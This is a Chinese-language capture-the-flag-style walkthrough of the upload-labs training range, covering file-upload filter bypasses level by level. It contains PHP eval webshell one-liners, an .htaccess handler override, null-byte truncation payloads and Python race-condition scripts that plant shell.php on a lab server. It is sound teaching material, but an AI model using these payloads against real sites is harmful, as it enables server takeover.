upload-labs记录
序
最近在圈子里看到的一个文件上传闯关靶场,一共有19关,趁着这个机会做一个教程,以下的内容只是自己的思路,绕过方法有很多种,欢迎大家一起交流,共同学习!
靶场环境
操作系统为windows,使用的phpstudy的集成环境,apache版本为2.4.23,所以apache2.2.x的解析漏洞在该环境下不管用,php版本为5.2.17,apache配置文件没有修改过,是默认的配置文件(第18关当中需要换成apache2.2.x,apache2.4.x暂时没找到绕过方法)
第一关

第一关的上传过滤只是在客户端进行过滤的,js对文件后缀名做了白名单限制,任何前端的验证都不算是真正的验证,在这里我使用了4种方式去绕过,这些方法都是绕过前端验证的常用方法
1.firebug查看元素,将这里的表单的onsubmit事件删除,这样提交表单时便不会触发验证函数


再次上传php就能上传


2.firebug控制台重新写一个和过滤函数名字一样的函数,使函数return true,覆盖之前的检查函数


之后上传php也能上传成功

3.在火狐浏览器中禁用js,在地址栏输入about:config,查找javascript,将javascript.enabled的类型改为false,默认值为true

禁用了js后就能绕过前端检测上传php了


4.先上传允许的后缀名绕过前端检测,之后burp抓包,在发往服务端的过程中将后缀名再修改为php


从而绕过了前端验证


第二关
第二关是在服务端做了验证,代码层对文件的MIME类型进行了检查,为了方便理解原理,可以看一下后端的检查代码
1 2 3 4 5 6 7 8
| if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) { if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) { $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name']; $is_upload = true; } } else { $msg = '文件类型不正确,请重新上传!'; }
|
有关这种场景的绕过方法,使用burp抓包,修改文件上传的content-type类型为白名单允许的图片MIME类型即可


然后就可以绕过检测上传成功了


第三关&第四关
第三关的本意其实是想上传一些后缀名为php、php2、php3、php5、phtml
等文件去绕过黑名单的,但是apache的配置文件里并没有配置将这些后缀的文件当做php解析

第三关第四关都是黑名单检测,但是在这里黑名单里都没有对.htacess做限制,所以这两关都可以上传.htaccess去绕过,.htaccess文件的内容如下
<FilesMatch "tony">
SetHandler application/x-httpd-php
</FilesMatch>
我们将这样一个.htaccess文件上传到服务器上传目录,这样的话,当apache在解析该目录下的php时,就会按照.htaccess中的要求去解析,只要匹配到了文件名里有tony这个字符串,就会把该文件当成php文件解析
首先上传这样的一个.htaccess文件

.htaccess可以上传成功

接着上传一个黑名单里没有过滤的随意后缀名文件,但是文件名里要有tony,上传一个tony.jpg,内容为一句话木马

上传成功,并且tony.jpg会被apache当成php文件解析


第四关也是同样的方法
第五关
第五关在第四关的黑名单中又加进了.htaccess,所以上传.htaccess这个思路没戏了
1
| $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
|
可以看看过滤内容,过滤的还挺多,这里apache版本为2.4.23,所以apache文件名(x.php.xxx)解析漏洞不能在这用
并且在做该黑名单检查之前将上传文件后的.
和空格字符都给删除了
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| $file_name = trim($_FILES['upload_file']['name']); $file_name = deldot($file_name); $file_ext = strrchr($file_name, '.'); $file_ext = str_ireplace('::$DATA', '', $file_ext); $file_ext = trim($file_ext); if (!in_array($file_ext, $deny_ext)) { if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) { $img_path = $UPLOAD_ADDR . '/' . $file_name; $is_upload = true; } } else { $msg = '此文件不允许上传'; }
|
这样做是为了防止用户上传是在后缀名后加上.
和空格去绕过黑名单,windows在创建文件时会删除后缀名后的.
和空格,并且后缀名为php.的文件也是可以当作php解析的(windows和linux环境都可以)
同时对文件名后缀名大小写写做了检查,防止大小写绕过
但是通过代码发现在黑名单检查之前处理文件名时只删除了一次.
,于是可以上传一个后缀名为php. .
的文件去绕过,这个在黑名单检查之前后缀名就会被处理为php.

可以看到成功绕过了上传检测


第六关
查看过滤代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess"); $file_name = $_FILES['upload_file']['name']; $file_name = deldot($file_name); $file_ext = strrchr($file_name, '.'); $file_ext = strtolower($file_ext); $file_ext = str_ireplace('::$DATA', '', $file_ext); if (!in_array($file_ext, $deny_ext)) { if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) { $img_path = $UPLOAD_ADDR . '/' . $file_name; $is_upload = true; } } else { $msg = '此文件不允许上传'; }
|
相对于第五关的过滤还少了一些,相同的黑名单,但是相比于第五关,这里仅仅删除了文件名后的.
,并没有删除空格,所以可以上传一个后缀名为php+空格
的文件去绕过黑名单,windows在创建文件时会自动删掉最后的空格

可以看到成功绕过这里的上传检测


第七关
第六关仅仅将文件名后面的点删除了,第七关则是仅仅将文件名后的空格给删除了,这里通过上传后缀名为php.
的文件来绕过黑名单

成功绕过黑名单上传


第八关
和第五关一样,虽然在黑名单检查之前将文件名后的.
和空格给删除了,但是.
只删除了一次,这里同样使用后缀名php. .
去绕过
第九关
一样的问题,所以继续用第八关的方法去绕过上传
第十关
尝试上传后缀名php的文件,看到可以上传成功,不过后缀名php被删除了

后缀名改为大写PHP上传,同样给删除了


猜想后台使用str_ireplace
函数将文件后缀为黑名单的都给删除了,查看过滤代码确实如此
1 2 3 4 5 6 7
| $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess"); $file_name = trim($_FILES['upload_file']['name']); $file_name = str_ireplace($deny_ext,"", $file_name); if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $file_name)) { $img_path = $UPLOAD_ADDR . '/' .$file_name; $is_upload = true; }
|
因为str_ireplace
函数只做一次替换,所以使用pphphp
后缀名就能绕过

可以看到成功上传php


第十一关
采用的防御手法是白名单过滤,只允许上传jpg、png和gif类型,并且将上传的文件给重命名为了白名单中的后缀
1 2 3 4 5 6 7 8 9 10 11 12
| $ext_arr = array('jpg','png','gif'); $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1); if(in_array($file_ext,$ext_arr)){ $temp_file = $_FILES['upload_file']['tmp_name']; $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext; if(move_uploaded_file($temp_file,$img_path)){ $is_upload = true; } else{ $msg = '上传失败!'; }
|
处理上传文件的方式
1 2
| $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
|
看起来这样防御并没有什么问题,但是这一关上传目录是可控的
所以可以先上传一个后缀名为jpg,内容为一句话木马的文件,然后修改上传目录为.php后缀,之后在.php后使用%00截断后面的拼接内容,注意这里需要关掉magic_quotes_gpc
这个php扩展,否则00会被转义
1
| $_GET['save_path']这里使用00截断."/".rand(10, 99).date("YmdHis").".".$file_ext;
|
注意这里的00字符因为在url的GET参数中,所以需用进行url编码

通过这种方法就可以成功绕过十一关的上传检测


第十二关
同样是上传路径可以控制,不同的是这里的路径是以POST参数传递的,同样的这里在目录后面使用00截断



可以看到成功绕过上传


第十三关&第十四关&第十五关
任务和之前的不同,这里只需要成功上传图片马,并且图片马里有完整的webshell即可
对于第十三关第十四关和第十五关这三关都是对文件幻数进行了检测,只不过第十四关使用的是getimagesize
函数,第十五关使用的是exif_imagetype
函数,函数返回值内容不一样而已
要想突破文件幻数检测,首先要了解jpg、png、gif这三种文件的头部格式,每种类型的图片内容最开头会有一个标志性的头部,这个头部被称为文件幻数。
jpg文件头部格式

文件头值为FFD8FFE000104A464946
png文件头格式,网上大部分资料写的都是89504E47
,但是经过我的测试,这四个16进制是仅仅不够的,如果只是89504E47
的话,会使getimagesize
函数和exif_imagetype
函数报错



经过我的测试真正的文件头值应该是89504E470D0A1A0A

gif文件头格式

文件头值为474946383961
经过测试,getimagesize
函数和exif_imagetype
函数都只是是对文件头进行检查,只要文件头部符合函数就会返回内容
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| <?php echo "check jpg</br>"; echo "getimagesize function return:</br>"; var_dump(getimagesize("heishacker.jpg")); echo "exif_imagetype function return:</br>"; var_dump(exif_imagetype("heishacker.jpg")); echo "</br>check png</br>"; echo "getimagesize function return:</br>"; var_dump(getimagesize("mingren.png")); echo "exif_imagetype function return:</br>"; var_dump(exif_imagetype("mingren.png")); echo "</br>check gif</br>"; echo "getimagesize function return:</br>"; var_dump(getimagesize("xiangtian.gif")); echo "exif_imagetype function return:</br>"; var_dump(exif_imagetype("xiangtian.gif")); ?>
|

所以这几关都可以上传图片马,图片马的文件头就是正常图片的文件头格式,从而绕过图片幻数检测
windows下图片马制作方式
copy x.jpg|png|gif/b+x.php/a x.jpg|png|gif
参数/b指定以二进制格式复制、合并文件(图片),参数/a指定以ASCII格式复制、合并文件(php文件),x.php文件里为要写的一句话木马
这三关都可以成功上传图片马,并且里面有完整的一句话木马,但是有时候图片马里面的一些字符会使php报错,导致用文件包含或者解析漏洞去解析图片马中的php时导致解析不了,可以看到利用文件包含去解析三个图片马时均不能解析



所以在寻找图片制作图片马时需要耐心的寻找一些不会使php报错的图片
而且有时候对文件大小也有限制,所以绕过文件幻数最合适的方式是利用16进制编辑器自己制作一个伪图片马,这里利用winhex分别创建shell.jpg、shell.png、shell.gif三个伪图片马



之后上传这三个伪图片马,这样不光可以上传成功,也可以利用文件包含漏洞或解析漏洞解析成功






这三关均可以采用这种方式通关,第十五关需要在php配置文件中开启php的php_exif扩展

当然,耐心的选择一个合适的图片制作图片马也是可以的
第十六关
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84
| $is_upload = false; $msg = null; if (isset($_POST['submit'])){ $filename = $_FILES['upload_file']['name']; $filetype = $_FILES['upload_file']['type']; $tmpname = $_FILES['upload_file']['tmp_name']; $target_path=$UPLOAD_ADDR.basename($filename); $fileext= substr(strrchr($filename,"."),1); if(($fileext == "jpg") && ($filetype=="image/jpeg")){ if(move_uploaded_file($tmpname,$target_path)) { $im = imagecreatefromjpeg($target_path); if($im == false){ $msg = "该文件不是jpg格式的图片!"; }else{ srand(time()); $newfilename = strval(rand()).".jpg"; $newimagepath = $UPLOAD_ADDR.$newfilename; imagejpeg($im,$newimagepath); $img_path = $UPLOAD_ADDR.$newfilename; unlink($target_path); $is_upload = true; } } else { $msg = "上传失败!"; } }else if(($fileext == "png") && ($filetype=="image/png")){ if(move_uploaded_file($tmpname,$target_path)) { $im = imagecreatefrompng($target_path); if($im == false){ $msg = "该文件不是png格式的图片!"; }else{ srand(time()); $newfilename = strval(rand()).".png"; $newimagepath = $UPLOAD_ADDR.$newfilename; imagepng($im,$newimagepath); $img_path = $UPLOAD_ADDR.$newfilename; unlink($target_path); $is_upload = true; } } else { $msg = "上传失败!"; } }else if(($fileext == "gif") && ($filetype=="image/gif")){ if(move_uploaded_file($tmpname,$target_path)) { $im = imagecreatefromgif($target_path); if($im == false){ $msg = "该文件不是gif格式的图片!"; }else{ srand(time()); $newfilename = strval(rand()).".gif"; $newimagepath = $UPLOAD_ADDR.$newfilename; imagegif($im,$newimagepath); $img_path = $UPLOAD_ADDR.$newfilename; unlink($target_path); $is_upload = true; } } else { $msg = "上传失败!"; } }else{ $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!"; } }
|
通过第十六关的php代码可以看到对文件后缀名和MIME类型进行了检查,而且用到了php的imagecreatefromjpeg
、imagecreatefrompng
、imagecreatefromgif
这几个图片处理函数对上传的图片进行了二次渲染生成了新的图片,所以如果在这里上传的是一个普通的图片马,虽然图片马可以上传成功,但是上传的图片马在经过二次渲染后,图片尾部的php代码就会被删除掉,所以在这里不能使用直接在图片尾部添加一句话木马的方式去合成图片马。但是这一关的代码有一个明显的逻辑漏洞,如果这几个二次渲染函数处理的不是一个图片,就会使这几个函数报错,因为这几个二次渲染的函数只会去处理一个图片内部格式正确的图片,所以在这里只需要上传一个后缀名为jpg、png、gif的一句话木马,这样的话上传的一句话木马会绕过后缀名和MIME类型的检查,通过move_uploaded_file
上传至服务器,但是遇到二次渲染时,由于上传的不是一个真正的图片,所以二次渲染函数在处理时会因为图片的内部格式报错,从而突破了对图片的二次渲染,这时候页面虽然会显示图片格式不允许,但是上传的一句话木马已经上传到了服务器
分别上传后缀名为jpg、png、gif的一句话木马,可以看到虽然上传的格式不允许,但是一句话马已经上传成功了
jpg



png



gif



以上只是单单针对这道题,那么如何真正的使用图片马突破二次渲染呢?可以看到如果直接使用在图片添加一句话木马的图片马上传的话,在二次渲染后一句话会被删除,导致图片马不能利用
按照一般的方法制作三种图片马

上传jpg图片马

上传后经过imagecreatefromjpeg
函数二次渲染,图片尾部的php一句话被删除

导致jpg图片马不能使用

上传png图片马

上传后经过imagecreatefrompng
函数二次渲染,图片尾部的php一句话被删除

导致png图片马不能使用

上传gif图片马

上传后经过imagecreatefromgif
函数二次渲染,图片尾部的php一句话被删除

导致gif图片马不能使用

尝试制作可以真正突破二次渲染的函数,这里可以通过十六进制编辑器查看比较上传前后图片的十六进制 ,找到二次渲染前后十六进制内容没有改变的部分,尝试将图片马写到这些没有改变的部分
自己对图片的16进制格式不是太理解,导致只制作出来了突破二次渲染的gif图片马,jpg和png都制作失败了,以后有时间再去研究


将相同的部分(全00)替换为一句话木马,运气比较好,图片并没有损坏,而且绕过了二次渲染,并且没有报php语法错误

但是jpg和png就不一样了,出现了很多问题,暂时还没有制作出真正图片二次渲染的jpg、png图片马
第十七关
要求上传一个webshell到服务器,提示需要代码审计,查看php源代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_name']; $file_ext = substr($file_name,strrpos($file_name,".")+1); $upload_file = $UPLOAD_ADDR . '/' . $file_name; if(move_uploaded_file($temp_file, $upload_file)){ if(in_array($file_ext,$ext_arr)){ $img_path = $UPLOAD_ADDR . '/'. rand(10, 99).date("YmdHis").".".$file_ext; rename($upload_file, $img_path); $is_upload = true; }else{ $msg = "只允许上传.jpg|.png|.gif类型文件!"; unlink($upload_file); } }else{ $msg = '上传失败!'; } }
|
通过php代码可以看到对上传的文件后缀做了白名单限制,如果上传的文件后缀如果不是jpg、png、gif的话就会被删除掉。但是这里可以使用竞争上传的方式去突破,同时使用多个进程去上传php文件,php文件的内容是向服务器目录下写一个webshell,之后不断去去访问上传的php文件,如果在删除该php文件之前访问到了该php文件,就会向服务器目录写一个webshell,用python去实现多进程上传
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| import requests from multiprocessing import Pool def CompeteUpload(list): url="http://192.168.242.128/upload-labs/Pass-17/index.php" geturl="http://192.168.242.128/upload-labs/upload/info.php" file={'upload_file':('info.php',"<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[ironman]);?>');?>",'image/jpeg')} data={'submit':'上传'} r=requests.post(url=url,data=data,files=file) r1=requests.get(url=geturl) if r1.status_code==200: print "upload success!" if __name__=="__main__": pool = Pool(10) pool.map(CompeteUpload, range(10000)) pool.close() pool.join()
|
可以看到通过多进程同时上传时可以成功在文件删除之前访问到该文件

在服务器目录下可以看到成功写入shell.php


第十八关
apache2.4.x的环境下暂时还未找到绕过方法,在apache2.2.x的环境下可以通过条件竞争加上apache2.2.x解析漏洞去绕过,这一关的要求是上传一个webshell到服务器,题目提示说需要代码审计,那么首先来看代码:
重要代码部分如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118
| $is_upload = false; $msg = null; if (isset($_POST['submit'])) { require_once("./myupload.php"); $imgFileName =time(); $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName); $status_code = $u->upload($UPLOAD_ADDR); switch ($status_code) { case 1: $is_upload = true; $img_path = $u->cls_upload_dir . $u->cls_file_rename_to; break; case 2: $msg = '文件已经被上传,但没有重命名。'; break; case -1: $msg = '这个文件不能上传到服务器的临时文件存储目录。'; break; case -2: $msg = '上传失败,上传目录不可写。'; break; case -3: $msg = '上传失败,无法上传该类型文件。'; break; case -4: $msg = '上传失败,上传的文件过大。'; break; case -5: $msg = '上传失败,服务器已经存在相同名称文件。'; break; case -6: $msg = '文件无法上传,文件不能复制到目标目录。'; break; default: $msg = '未知错误!'; break; } } class MyUpload{ ...... ...... ...... var $cls_arr_ext_accepted = array( ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt", ".html", ".xml", ".tiff", ".jpeg", ".png" ); ...... ...... ...... function upload( $dir ){ $ret = $this->isUploadedFile(); if( $ret != 1 ){ return $this->resultUpload( $ret ); } $ret = $this->setDir( $dir ); if( $ret != 1 ){ return $this->resultUpload( $ret ); } $ret = $this->checkExtension(); if( $ret != 1 ){ return $this->resultUpload( $ret ); } $ret = $this->checkSize(); if( $ret != 1 ){ return $this->resultUpload( $ret ); } if( $this->cls_file_exists == 1 ){ $ret = $this->checkFileExists(); if( $ret != 1 ){ return $this->resultUpload( $ret ); } } $ret = $this->move(); if( $ret != 1 ){ return $this->resultUpload( $ret ); } if( $this->cls_rename_file == 1 ){ $ret = $this->renameFile(); if( $ret != 1 ){ return $this->resultUpload( $ret ); } } return $this->resultUpload( "SUCCESS" ); } ...... ...... ...... };
|
分析一下代码的执行过程,首先使用$_FILES['upload_file']['name']
接收文件名,然后获取文件后缀名进行白名单检查,需要注意的是这里使用的strrchr
函数去截取后缀名的,所以获取到的是最后一个点后面的后缀名。如果后缀名不在白名单内的话就会提示上传失败,否则就会将文件使用rename
函数重命名后上传至指定的目录,比如上传的是shell.php.xxx
,shell.php
会被重命名,导致最终文件命名变为xxxx.jpg
而无法解析,所以这里同样需要使用竞争上传的方式,在重命名之前将文件上传至服务器,之后再结合apache2.2.x的解析漏洞使文件被解析,所以这里可以构造文件名为shell.php.7z
贴出我写的上传脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| import requests from multiprocessing import Pool def CompeteUpload(list): url="http://192.168.233.130:8080/upload-labs/Pass-18/index.php" geturl="http://192.168.233.130:8080/upload-labs/upload/info.php" file={'upload_file':('shell.php.7z',"<?php @eval($_POST['c1imber']);?>",'image/jpeg')} data={'submit':'上传'} r=requests.post(url=url,data=data,files=file) r1=requests.get(url=geturl) if r1.status_code==200: print "upload success!" if __name__=="__main__": pool = Pool(10) pool.map(CompeteUpload, range(10000)) pool.close() pool.join()
|
成功上传

第十九关
代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess"); $file_name = $_POST['save_name']; $file_ext = pathinfo($file_name,PATHINFO_EXTENSION); if(!in_array($file_ext,$deny_ext)) { $img_path = $UPLOAD_ADDR . '/' .$file_name; if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $img_path)) { $is_upload = true; }else{ $msg = '上传失败!'; } }else{ $msg = '禁止保存为该类型文件!'; } } else { $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!'; } }
|
这一关和第11关类似,只不过这一关的路径部分是由$_POST
控制的,而第十一关是由$_GET
控制的,不过原理都是一样的,这样会导致00字符可以被拼接入文件路径内,进而被传入move_uploaded_file
函数内,然后该函数在将临时文件移动至指定路径的时候将会产生00截断上传(CVE-2015-2348)
所以这里可以设置文件名为shell.php .jpg
,然后在空格处进行00截断

之后就可以上传成功了

